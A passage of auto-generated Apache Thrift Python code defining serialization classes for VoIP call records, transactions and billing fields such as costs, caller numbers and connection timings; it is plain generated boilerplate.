self.realt.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('MonoTime')
if self.monot is not None:
oprot.writeFieldBegin('monot', TType.STRUCT, 1)
self.monot.write(oprot)
oprot.writeFieldEnd()
if self.realt is not None:
oprot.writeFieldBegin('realt', TType.STRUCT, 2)
self.realt.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TransactionRecord(object):
"""
Attributes:
- type
- data
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'type', None, None, ), # 1
(2, TType.STRING, 'data', 'UTF8', None, ), # 2
)
def __init__(self, type=None, data=None,):
self.type = type
self.data = data
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.type = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.data = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TransactionRecord')
if self.type is not None:
oprot.writeFieldBegin('type', TType.I32, 1)
oprot.writeI32(self.type)
oprot.writeFieldEnd()
if self.data is not None:
oprot.writeFieldBegin('data', TType.STRING, 2)
oprot.writeString(self.data.encode('utf-8') if sys.version_info[0] == 2 else self.data)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Transaction(object):
"""
Attributes:
- records
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'records', (TType.STRUCT, (TransactionRecord, TransactionRecord.thrift_spec), False), None, ), # 1
)
def __init__(self, records=None,):
self.records = records
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.records = []
(_etype3, _size0) = iprot.readListBegin()
for _i4 in range(_size0):
_elem5 = TransactionRecord()
_elem5.read(iprot)
self.records.append(_elem5)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Transaction')
if self.records is not None:
oprot.writeFieldBegin('records', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.records))
for iter6 in self.records:
iter6.write(oprot)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Calls(object):
"""
Attributes:
- i_call
- call_id
- cld
- cli
- setup_time
- parent_i_call
- i_call_type
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_call', None, None, ), # 1
(2, TType.STRING, 'call_id', 'UTF8', None, ), # 2
(3, TType.STRING, 'cld', 'UTF8', None, ), # 3
(4, TType.STRING, 'cli', 'UTF8', None, ), # 4
(5, TType.I64, 'setup_time', None, None, ), # 5
(6, TType.STRUCT, 'parent_i_call', (NullInt64, NullInt64.thrift_spec), None, ), # 6
(7, TType.STRUCT, 'i_call_type', (NullInt64, NullInt64.thrift_spec), None, ), # 7
)
def __init__(self, i_call=None, call_id=None, cld=None, cli=None, setup_time=None, parent_i_call=None, i_call_type=None,):
self.i_call = i_call
self.call_id = call_id
self.cld = cld
self.cli = cli
self.setup_time = setup_time
self.parent_i_call = parent_i_call
self.i_call_type = i_call_type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.call_id = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.cld = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.cli = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.parent_i_call = NullInt64()
self.parent_i_call.read(iprot)
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.STRUCT:
self.i_call_type = NullInt64()
self.i_call_type.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Calls')
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 1)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.call_id is not None:
oprot.writeFieldBegin('call_id', TType.STRING, 2)
oprot.writeString(self.call_id.encode('utf-8') if sys.version_info[0] == 2 else self.call_id)
oprot.writeFieldEnd()
if self.cld is not None:
oprot.writeFieldBegin('cld', TType.STRING, 3)
oprot.writeString(self.cld.encode('utf-8') if sys.version_info[0] == 2 else self.cld)
oprot.writeFieldEnd()
if self.cli is not None:
oprot.writeFieldBegin('cli', TType.STRING, 4)
oprot.writeString(self.cli.encode('utf-8') if sys.version_info[0] == 2 else self.cli)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 5)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.parent_i_call is not None:
oprot.writeFieldBegin('parent_i_call', TType.STRUCT, 6)
self.parent_i_call.write(oprot)
oprot.writeFieldEnd()
if self.i_call_type is not None:
oprot.writeFieldBegin('i_call_type', TType.STRUCT, 7)
self.i_call_type.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class Cdrs(object):
"""
Attributes:
- i_cdr
- i_call
- i_account
- result
- cost
- delay
- duration
- billed_duration
- connect_time
- disconnect_time
- cld_in
- cli_in
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- remote_ip
- grace_period
- user_agent
- pdd1xx
- i_protocol
- release_source
- plan_duration
- accessibility_cost
- lrn_cld
- lrn_cld_in
- area_name
- p_asserted_id
- remote_party_id
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdr', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_account', None, None, ), # 3
(4, TType.I64, 'result', None, None, ), # 4
(5, TType.DOUBLE, 'cost', None, None, ), # 5
(6, TType.DOUBLE, 'delay', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'connect_time', None, None, ), # 9
(10, TType.I64, 'disconnect_time', None, None, ), # 10
(11, TType.STRING, 'cld_in', 'UTF8', None, ), # 11
(12, TType.STRING, 'cli_in', 'UTF8', None, ), # 12
(13, TType.STRING, 'prefix', 'UTF8', None, ), # 13
(14, TType.DOUBLE, 'price_1', None, None, ), # 14
(15, TType.DOUBLE, 'price_n', None, None, ), # 15
(16, TType.I32, 'interval_1', None, None, ), # 16
(17, TType.I32, 'interval_n', None, None, ), # 17
(18, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 18
(19, TType.DOUBLE, 'connect_fee', None, None, ), # 19
(20, TType.I64, 'free_seconds', None, None, ), # 20
(21, TType.STRING, 'remote_ip', 'UTF8', None, ), # 21
(22, TType.I32, 'grace_period', None, None, ), # 22
(23, TType.STRING, 'user_agent', 'UTF8', None, ), # 23
(24, TType.DOUBLE, 'pdd1xx', None, None, ), # 24
(25, TType.I16, 'i_protocol', None, None, ), # 25
(26, TType.STRING, 'release_source', 'UTF8', None, ), # 26
(27, TType.DOUBLE, 'plan_duration', None, None, ), # 27
(28, TType.DOUBLE, 'accessibility_cost', None, None, ), # 28
(29, TType.STRUCT, 'lrn_cld', (NullString, NullString.thrift_spec), None, ), # 29
(30, TType.STRUCT, 'lrn_cld_in', (NullString, NullString.thrift_spec), None, ), # 30
(31, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 31
(32, TType.STRUCT, 'p_asserted_id', (NullString, NullString.thrift_spec), None, ), # 32
(33, TType.STRUCT, 'remote_party_id', (NullString, NullString.thrift_spec), None, ), # 33
)
def __init__(self, i_cdr=None, i_call=None, i_account=None, result=None, cost=None, delay=None, duration=None, billed_duration=None, connect_time=None, disconnect_time=None, cld_in=None, cli_in=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, remote_ip=None, grace_period=None, user_agent=None, pdd1xx=None, i_protocol=None, release_source=None, plan_duration=None, accessibility_cost=None, lrn_cld=None, lrn_cld_in=None, area_name=None, p_asserted_id=None, remote_party_id=None,):
self.i_cdr = i_cdr
self.i_call = i_call
self.i_account = i_account
self.result = result
self.cost = cost
self.delay = delay
self.duration = duration
self.billed_duration = billed_duration
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.cld_in = cld_in
self.cli_in = cli_in
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.remote_ip = remote_ip
self.grace_period = grace_period
self.user_agent = user_agent
self.pdd1xx = pdd1xx
self.i_protocol = i_protocol
self.release_source = release_source
self.plan_duration = plan_duration
self.accessibility_cost = accessibility_cost
self.lrn_cld = lrn_cld
self.lrn_cld_in = lrn_cld_in
self.area_name = area_name
self.p_asserted_id = p_asserted_id
self.remote_party_id = remote_party_id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdr = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_account = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I64:
self.result = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.delay = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.STRING:
self.cld_in = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.STRING:
self.cli_in = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I64:
self.free_seconds = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.STRING:
self.remote_ip = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 22:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 23:
if ftype == TType.STRING:
self.user_agent = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 24:
if ftype == TType.DOUBLE:
self.pdd1xx = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 25:
if ftype == TType.I16:
self.i_protocol = iprot.readI16()
else:
iprot.skip(ftype)
elif fid == 26:
if ftype == TType.STRING:
self.release_source = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 27:
if ftype == TType.DOUBLE:
self.plan_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 28:
if ftype == TType.DOUBLE:
self.accessibility_cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 29:
if ftype == TType.STRUCT:
self.lrn_cld = NullString()
self.lrn_cld.read(iprot)
else:
iprot.skip(ftype)
elif fid == 30:
if ftype == TType.STRUCT:
self.lrn_cld_in = NullString()
self.lrn_cld_in.read(iprot)
else:
iprot.skip(ftype)
elif fid == 31:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 32:
if ftype == TType.STRUCT:
self.p_asserted_id = NullString()
self.p_asserted_id.read(iprot)
else:
iprot.skip(ftype)
elif fid == 33:
if ftype == TType.STRUCT:
self.remote_party_id = NullString()
self.remote_party_id.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('Cdrs')
if self.i_cdr is not None:
oprot.writeFieldBegin('i_cdr', TType.I64, 1)
oprot.writeI64(self.i_cdr)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_account is not None:
oprot.writeFieldBegin('i_account', TType.I64, 3)
oprot.writeI64(self.i_account)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I64, 4)
oprot.writeI64(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 5)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.delay is not None:
oprot.writeFieldBegin('delay', TType.DOUBLE, 6)
oprot.writeDouble(self.delay)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 9)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 10)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.cld_in is not None:
oprot.writeFieldBegin('cld_in', TType.STRING, 11)
oprot.writeString(self.cld_in.encode('utf-8') if sys.version_info[0] == 2 else self.cld_in)
oprot.writeFieldEnd()
if self.cli_in is not None:
oprot.writeFieldBegin('cli_in', TType.STRING, 12)
oprot.writeString(self.cli_in.encode('utf-8') if sys.version_info[0] == 2 else self.cli_in)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 13)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 14)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 15)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 16)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 17)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 18)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 19)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I64, 20)
oprot.writeI64(self.free_seconds)
oprot.writeFieldEnd()
if self.remote_ip is not None:
oprot.writeFieldBegin('remote_ip', TType.STRING, 21)
oprot.writeString(self.remote_ip.encode('utf-8') if sys.version_info[0] == 2 else self.remote_ip)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 22)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.user_agent is not None:
oprot.writeFieldBegin('user_agent', TType.STRING, 23)
oprot.writeString(self.user_agent.encode('utf-8') if sys.version_info[0] == 2 else self.user_agent)
oprot.writeFieldEnd()
if self.pdd1xx is not None:
oprot.writeFieldBegin('pdd1xx', TType.DOUBLE, 24)
oprot.writeDouble(self.pdd1xx)
oprot.writeFieldEnd()
if self.i_protocol is not None:
oprot.writeFieldBegin('i_protocol', TType.I16, 25)
oprot.writeI16(self.i_protocol)
oprot.writeFieldEnd()
if self.release_source is not None:
oprot.writeFieldBegin('release_source', TType.STRING, 26)
oprot.writeString(self.release_source.encode('utf-8') if sys.version_info[0] == 2 else self.release_source)
oprot.writeFieldEnd()
if self.plan_duration is not None:
oprot.writeFieldBegin('plan_duration', TType.DOUBLE, 27)
oprot.writeDouble(self.plan_duration)
oprot.writeFieldEnd()
if self.accessibility_cost is not None:
oprot.writeFieldBegin('accessibility_cost', TType.DOUBLE, 28)
oprot.writeDouble(self.accessibility_cost)
oprot.writeFieldEnd()
if self.lrn_cld is not None:
oprot.writeFieldBegin('lrn_cld', TType.STRUCT, 29)
self.lrn_cld.write(oprot)
oprot.writeFieldEnd()
if self.lrn_cld_in is not None:
oprot.writeFieldBegin('lrn_cld_in', TType.STRUCT, 30)
self.lrn_cld_in.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 31)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.p_asserted_id is not None:
oprot.writeFieldBegin('p_asserted_id', TType.STRUCT, 32)
self.p_asserted_id.write(oprot)
oprot.writeFieldEnd()
if self.remote_party_id is not None:
oprot.writeFieldBegin('remote_party_id', TType.STRUCT, 33)
self.remote_party_id.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CdrsConnections(object):
"""
Attributes:
- i_cdrs_connection
- i_call
- i_connection
- result
- cost
- delay
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- cld_out
- cli_out
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
- user_agent
- pdd100
- pdd1xx
- i_account_debug
- i_protocol
- release_source
- call_setup_time
- lrn_cld
- area_name
- i_media_relay
- remote_ip
- vendor_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_connection', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_connection', None, None, ), # 3
(4, TType.I32, 'result', None, None, ), # 4
(5, TType.DOUBLE, 'cost', None, None, ), # 5
(6, TType.DOUBLE, 'delay', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'setup_time', None, None, ), # 9
(10, TType.I64, 'connect_time', None, None, ), # 10
(11, TType.I64, 'disconnect_time', None, None, ), # 11
(12, TType.STRING, 'cld_out', 'UTF8', None, ), # 12
(13, TType.STRING, 'cli_out', 'UTF8', None, ), # 13
(14, TType.STRING, 'prefix', 'UTF8', None, ), # 14
(15, TType.DOUBLE, 'price_1', None, None, ), # 15
(16, TType.DOUBLE, 'price_n', None, None, ), # 16
(17, TType.I32, 'interval_1', None, None, ), # 17
(18, TType.I32, 'interval_n', None, None, ), # 18
(19, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 19
(20, TType.DOUBLE, 'connect_fee', None, None, ), # 20
(21, TType.I32, 'free_seconds', None, None, ), # 21
(22, TType.I32, 'grace_period', None, None, ), # 22
(23, TType.STRING, 'user_agent', 'UTF8', None, ), # 23
(24, TType.DOUBLE, 'pdd100', None, None, ), # 24
(25, TType.DOUBLE, 'pdd1xx', None, None, ), # 25
(26, TType.I64, 'i_account_debug', None, None, ), # 26
(27, TType.I32, 'i_protocol', None, None, ), # 27
(28, TType.STRING, 'release_source', 'UTF8', None, ), # 28
(29, TType.I64, 'call_setup_time', None, None, ), # 29
(30, TType.STRUCT, 'lrn_cld', (NullString, NullString.thrift_spec), None, ), # 30
(31, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 31
(32, TType.STRUCT, 'i_media_relay', (NullInt64, NullInt64.thrift_spec), None, ), # 32
(33, TType.STRUCT, 'remote_ip', (NullString, NullString.thrift_spec), None, ), # 33
(34, TType.STRUCT, 'vendor_name', (NullString, NullString.thrift_spec), None, ), # 34
)
def __init__(self, i_cdrs_connection=None, i_call=None, i_connection=None, result=None, cost=None, delay=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, cld_out=None, cli_out=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None, user_agent=None, pdd100=None, pdd1xx=None, i_account_debug=None, i_protocol=None, release_source=None, call_setup_time=None, lrn_cld=None, area_name=None, i_media_relay=None, remote_ip=None, vendor_name=None,):
self.i_cdrs_connection = i_cdrs_connection
self.i_call = i_call
self.i_connection = i_connection
self.result = result
self.cost = cost
self.delay = delay
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.cld_out = cld_out
self.cli_out = cli_out
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
self.user_agent = user_agent
self.pdd100 = pdd100
self.pdd1xx = pdd1xx
self.i_account_debug = i_account_debug
self.i_protocol = i_protocol
self.release_source = release_source
self.call_setup_time = call_setup_time
self.lrn_cld = lrn_cld
self.area_name = area_name
self.i_media_relay = i_media_relay
self.remote_ip = remote_ip
self.vendor_name = vendor_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.delay = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.STRING:
self.cld_out = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.STRING:
self.cli_out = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
